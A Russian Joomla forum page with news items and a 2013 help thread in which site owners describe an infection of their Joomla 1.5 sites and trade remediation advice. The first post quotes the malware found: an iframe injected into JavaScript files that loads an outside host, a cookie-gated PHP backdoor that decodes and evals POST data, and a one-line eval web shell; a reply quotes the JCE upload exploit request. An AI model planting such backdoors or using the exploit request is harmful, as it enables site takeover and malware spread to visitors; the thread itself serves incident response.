Новости Joomla

🏆 Открыто голосование за Joomla в премии CMS Critic People’s Choice Awards 2025

🏆 Открыто голосование за Joomla в премии CMS Critic People’s Choice Awards 2025

🗓 Голосование продлится до 27 февраля 2026 года.

👩‍💻 Проголосовать! 👩‍💻

Номинации, в которых можно проголосовать за Joomla:
⭐️ Best Free CMS
⭐️ Best Open Source CMS
⭐️ Best Enterprise CMS

Также в номинации Best e-Commerce Solution участвуют компоненты интернет-магазинов для Joomla:
⭐️ HikaShop
⭐️ Virtuemart

В номинации Best Website Builder оказались:
⭐️ YooTheme
⭐️ SP Page Builder

Что такое CMS Critic Awards?
С 2012 года премия CMS Critic Awards занимает особое место в сообществе систем управления контентом (CMS). Это единственный в своем роде сайт, который составляет рейтинг системы управления контентом и связанных с ними решений на рынке — от малого до крупного и подчеркивает их инновации и услуги.

Каждый год награда CMS Critic Awards присуждается одному победителю в различных отраслевых категориях, таких как: «Лучшая облачная CMS», «Лучший DXP», «Лучшая Headless CMS и других. Затем результаты оглашаются через СМИ вместе с выбором редакции CMS Critic.
В этом году премия вернулась к своим традициям и только TOP-5 движков по количеству номинаций попали в 2-й этап - голосование.

@joomlafeed

👩‍💻 Релиз JoomGallery 4.3.0 - компонент галереи изображений для Joomla.

👩‍💻 Релиз JoomGallery 4.3.0 - компонент галереи изображений для Joomla.

Одна из самых популярных и старейших фото-галерей для Joomla получила новую версию.

👉 v.4.3.0. Что нового?
Панель управления для зарегистрированных пользователей. В этой версии появилась возможность каждому зарегистрированному пользователю управлять своими категориями и изображениями во фронтенде сайта.

Документация по новой функции.
Сайт проекта

@joomlafeed

👩‍💻 Вместе мы развиваем Joomla: станьте Joomfluencer!

👩‍💻 Вместе мы развиваем Joomla: станьте Joomfluencer!

Вы уверенно чувствуете себя перед камерой, динамичны, обаятельны и всегда улыбаетесь? Чувствуете себя искателем приключений, готовым поделиться своими исследованиями CMS Joomla!, взять интервью у видных деятелей сообщества, пообщаться лично или по видеосвязи с волонтерами Joomla или отправиться на поиски новых идей?

Joomla ищет одного или нескольких волонтеров, готовых вдохнуть новую жизнь в обсуждение Joomla, ее CMS, пользователей, сообщества и многого другого.

Возможны самые разные форматы и темы: шортсы, интервью, аналитика и разборы в режиме реального времени, быстрые советы и рекомендации, знакомство с миром Joomla, изучение открытого исходного кода... Нет никаких ограничений!

Joomla! уже активно представлена ​​во многих социальных сетях:
- 155K подписчиков на Facebook,
- 55K подписчиков на X (ранее Twitter),
- 16K подписчиков на YouTube,
- 14K подписчиков на LinkedIn,
- 5,7K подписчиков в Instagram
а так же другие площадки ждут вас. Аккаунты Threads и Bluesky относительно новые, но их популярность только растёт!

А если хватит энергии, можно рассмотреть и TikTok!

❓ Итак, вы готовы?
👉 Свяжитесь с отделом маркетинга по адресу: marketing@community.joomla.org

Подробности в статье в Joomla Community Magazine.

@joomlafeed

1   Вниз
0 Пользователей и 1 Гость просматривают эту тему.
  • 13 Ответов
  • 6733 Просмотров
*

tkav

  • Осваиваюсь на форуме
  • 23
  • 0 / 0
Все сайты на одном аккаунте заражены (Joomla 1.5.26)
« : 07.02.2013, 00:23:55 »
Короче началось с того, что Касперский начал ругаться при просмотре сайта.
При анализе выяснилось, что все папки с доменами-сайтами заржены. Зараза каключается в добавлении ко ВСЕМ *.js дописки вида
Код
;document.write('<iframe name="Sertnox" style="position:fixed;left:-500px;top:0px;" height="128" width="128" src="http://rsdlfyrn.lflinkup.net/e8ddc4f1.3HIcyxr?default"></iframe>');
при восстановлении чистых файлов с дистрибутива, практически сразу этот код появляется опять. Дата изменения файлов при этом не меняется.
Также были обнаружены файлы с разными названиями типа
.e9gwpz.php
.bhuzih.php
и т.п.  (конечно всё, что нашел, удалил)
их содержимое такое:
Код
<?php
if(!empty($_COOKIE['__utma']) and substr($_COOKIE['__utma'],0,16)=='3469825000034634'){
if (!empty($_POST['msg']) and $msg=@gzinflate(@base64_decode(@str_replace(' ','',urldecode($_POST['msg']))))){
  echo '<textarea id=areatext>';
  eval($msg);
  echo '</textarea>bg';
  exit;
}}
?>

Также встретил подозрительный файл j.php :
Код
# Netscape HTTP Cookie File
# http://curl.haxx.se/rfc/cookie_spec.html
# This file was generated by libcurl! Edit at your own risk.

194.242.59.43	FALSE	/about/	FALSE	0	<?eval(stripslashes(array_pop($_POST)))?>	1

А также ещё несколько подозрительных, которые подлиннее, начинаются они так:
Код
<?php
/**
* @version		$Id: framework.php 22381 2011-11-14 01:18:53Z dextercowley $
* @package		Joomla
* @copyright	Copyright (C) 2005 - 2010 Open Source Matters. All rights reserved.
* @license		GNU/GPL, see LICENSE.php
* Joomla! is free software. This version may have been modified pursuant
* to the GNU General Public License, and as distributed it includes or
* is derivative of works licensed under the GNU General Public License or
* other free or open source software licenses.
* See COPYRIGHT.php for copyright notices and details.
*/

// no direct access
class JToolBarHelper
{

	/**
	* Title cell
	* For the title and toolbar to be rendered correctly,
	* this title fucntion must be called before the starttable function and the toolbars icons
	* this is due to the nature of how the CSS has been used to postion the title in respect to the toolbar
	* @param string The title
	* @param string The name of the image
	* @since 1.5
	*/
	function title($title, $icon = 'generic.png')
	{.....

Подскажите, как вылечить заразу и найти уязвимость...
Время изменения файлов не фиксируется, так что и логи затруднительно посмотреть. Обращения извне во время возобновления заражения файлов не происходит. Заражаются даже те сайты(папки), домены которых не существуют, т.е. скрипт тупо сканирует все папки аккаунта...
Хостинг jino.ru ; Joomla 1.5.26 и иногда 1.5.23 (всего штук 20 сайтов)

Для пробы перенес несколько сайтов на другой хостинг (sweb.ru) - вручную вроде всё вычистил при этом - но они тоже заразились через неделю.
Записан
*

draff

  • Гуру
  • 5801
  • 434 / 7
  • ищу работу
Re: Все сайты на одном аккаунте заражены (Joomla 1.5.26)
« Ответ #1 : 07.02.2013, 01:38:36 »
искать шелл. Сканеры в темах раздела.
Записан
*

Zemlianin

  • Новичок
  • 3
  • 0 / 0
Re: Все сайты на одном аккаунте заражены (Joomla 1.5.26)
« Ответ #2 : 07.02.2013, 09:36:28 »
У меня вчера тоже самое началось, добавились хвосты к JS файлам со словом "Sertnox".
В Joomla 1.5 сайт работает без видимых нарушений. В Joomla 1.0 полетело меню админки и редакторы.
В Joomla 2.5 полетели редакторы. Обычная чистка JS файлов не помогает.
« Последнее редактирование: 07.02.2013, 09:40:04 от Zemlianin »
Записан
*

festLethal

  • Захожу иногда
  • 64
  • 1 / 0
Re: Все сайты на одном аккаунте заражены (Joomla 1.5.26)
« Ответ #3 : 07.02.2013, 10:11:40 »
У меня подобное было, уязвимость была в том, что пароли сохранял в ftp клиенте, что делать не стоит
Записан
*

tkav

  • Осваиваюсь на форуме
  • 23
  • 0 / 0
Re: Все сайты на одном аккаунте заражены (Joomla 1.5.26)
« Ответ #4 : 07.02.2013, 10:36:35 »
Цитата: Zemlianin от 07.02.2013, 09:36:28
У меня вчера тоже самое началось, добавились хвосты к JS файлам со словом "Sertnox".
В Joomla 1.5 сайт работает без видимых нарушений.
Это до той поры, пока не испортятся файлы админки. Я временно восстанавливваю работоспособность наложением поверх дистрибутива Joomla.  
Пожалуйста, поделитесь своими действиями, которые приводят к положительному результату.

Цитата: festLethal от 07.02.2013, 10:11:40
У меня подобное было, уязвимость была в том, что пароли сохранял в ftp клиенте, что делать не стоит
Изменил все доступы и пароли... Но сильно сомневаюсь, что вредоносный код проник через ftp. Скорее всего какая-то уязвимость J или сторонних компонентов. Полазил по хакерскому форуму, но навскидку не нашел в их списке своих компонентов.
« Последнее редактирование: 07.02.2013, 10:39:47 от tkav »
Записан
*

Zemlianin

  • Новичок
  • 3
  • 0 / 0
Re: Все сайты на одном аккаунте заражены (Joomla 1.5.26)
« Ответ #5 : 07.02.2013, 12:42:03 »
У меня шесть сайтов на одном сервере, все заразились. Скорее всего зараза идет через ворованные пароли к FTP. Придется пароли хранить в другом месте.
Записан
*

flyingspook

  • Moderator
  • 3590
  • 247 / 9
Re: Все сайты на одном аккаунте заражены (Joomla 1.5.26)
« Ответ #6 : 07.02.2013, 15:37:26 »
все последствия поста ТС это редактор JCE и менеджер от nonumber, последняя уязвимость
@tkav
пост хороший перенесите в тему
http://joomlaforum.ru/index.php/topic,246899.0.html
развернутый ответ дадут там
Записан
*

tkav

  • Осваиваюсь на форуме
  • 23
  • 0 / 0
Re: Все сайты на одном аккаунте заражены (Joomla 1.5.26)
« Ответ #7 : 07.02.2013, 18:44:22 »
Цитата: flyingspook от 07.02.2013, 15:37:26
все последствия поста ТС это редактор JCE и менеджер от nonumber, последняя уязвимость
JCE не пользуюсь, стоит дефолтный TinyMCE . nonumber - не пользуюсь и даже не знаю что это.
Здесь что-то другое....
Записан
*

flyingspook

  • Moderator
  • 3590
  • 247 / 9
Re: Все сайты на одном аккаунте заражены (Joomla 1.5.26)
« Ответ #8 : 08.02.2013, 18:08:49 »
повторю
Цитировать
все последствия поста ТС это редактор JCE и менеджер от nonumber, последняя уязвимость
+ не вовремя обновленный движок
+ это касается всех сайтов на учетке/пользователе хоста
другие причины угон/подбор пасов, кому то насолили
Записан
*

melnik

  • Захожу иногда
  • 51
  • 3 / 0
Re: Все сайты на одном аккаунте заражены (Joomla 1.5.26)
« Ответ #9 : 09.02.2013, 19:29:27 »
Такая же проблема. Три сайта на выделенном IP заражены. В js появляются левые ifrаmы. Сначала удалял эту фигню, а потом обратил внимание, что они появляются и пропадают сами. Притом иногда дописки в js проявляются сразу на трех сайтах, а иногда на двух, а третий чист. Не могу найти источник заразы, доступ по ftp закрыт. Помогите кто-нибудь, если кто-то разобрался в этой проблеме.  

два сайта на Joomla 5.2.9 и один на Joomla 1.5.26
« Последнее редактирование: 09.02.2013, 20:09:42 от melnik »
Записан
*

Zemlianin

  • Новичок
  • 3
  • 0 / 0
Re: Все сайты на одном аккаунте заражены (Joomla 1.5.26)
« Ответ #10 : 09.02.2013, 21:42:42 »
Цитата: Zemlianin от 07.02.2013, 12:42:03
У меня шесть сайтов на одном сервере, все заразились. Скорее всего зараза идет через ворованные пароли к FTP. Придется пароли хранить в другом месте.
-------------------------------------------------------
Посмотрел FTP LOG файл, чужие не заходили. Вся зараза идет через уязвимость редактора JCE. Нужно восстановить прежнюю версию сайта до заражения, удалить JCE из компонентов и плагинов закачать последние версии редактора и Joomla соответственно 1.5   1.6   1.7   2.5 на всех сайтах акаунта.
Записан
*

Rex_One

  • Захожу иногда
  • 453
  • 37 / 0
Re: Все сайты на одном аккаунте заражены (Joomla 1.5.26)
« Ответ #11 : 10.02.2013, 00:57:02 »
JCE ОБНОВЛЯТЬ ВСЕМ СРОЧНО!

При взломе осуществляется запрос на сайт, который позволяет в любую часть сайта записать файл:
POST /index.php?option=com_jce&task=plugin&plugin=imgmanager&file=imgmanager&method=form

Сейчас наблюдаются случаи, когда злоумышленник закачивает файл sejeal.jpg или x.txt в корень сайта.

Пресс релиз на сайте модуля
http://www.joomlacontenteditor.net/news/item/jce-and-your-sites-security
Записан
Кривизна рук не компенсирует прямизну извилин.
*

tkav

  • Осваиваюсь на форуме
  • 23
  • 0 / 0
Re: Все сайты на одном аккаунте заражены (Joomla 1.5.26)
« Ответ #12 : 10.02.2013, 19:00:45 »
Данная конкретная зараза (которая пишет в *.js) прицепилась точно не из JCE, т.к  он у меня точно не установлен.
Да, кто-то тайно управляет появлением/изчезанием посторонних ссылок в скриптах. Причем часто убирается некорректно и сайты перестают работать, особенно админка страдает.
Записан
*

flyingspook

  • Moderator
  • 3590
  • 247 / 9
Re: Все сайты на одном аккаунте заражены (Joomla 1.5.26)
« Ответ #13 : 10.02.2013, 19:07:58 »
обсуждение переносим в тему
http://joomlaforum.ru/index.php/topic,246899.0.html
Записан
1   Вверх
Чтобы оставить сообщение,
Вам необходимо Войти или Зарегистрироваться
 

Как выявить вредоностный код на CMS Joomla?

Автор stud_pro

 Ответов: 1
Просмотров: 3089 		Последний ответ 23.04.2024, 10:06:10
от wishlight
Вирус редирект или взлом с редиректом Joomla 3.10

Автор Wany205

 Ответов: 1
Просмотров: 4175 		Последний ответ 25.05.2023, 08:49:57
от Театрал
Скрипты защиты Joomla 4

Автор mister_boy

 Ответов: 6
Просмотров: 3942 		Последний ответ 16.05.2023, 16:38:58
от mister_boy
Компоненты и скрипты для защиты сайта. Логи атак на сайты

Автор wishlight

 Ответов: 678
Просмотров: 271278 		Последний ответ 14.09.2022, 14:29:43
от wishlight
Поставил Joomla 4. Хостинг nic.ru стал ругаться на ошибки безопасности

Автор Oleg+

 Ответов: 5
Просмотров: 2892 		Последний ответ 13.09.2021, 09:23:28
от Oleg+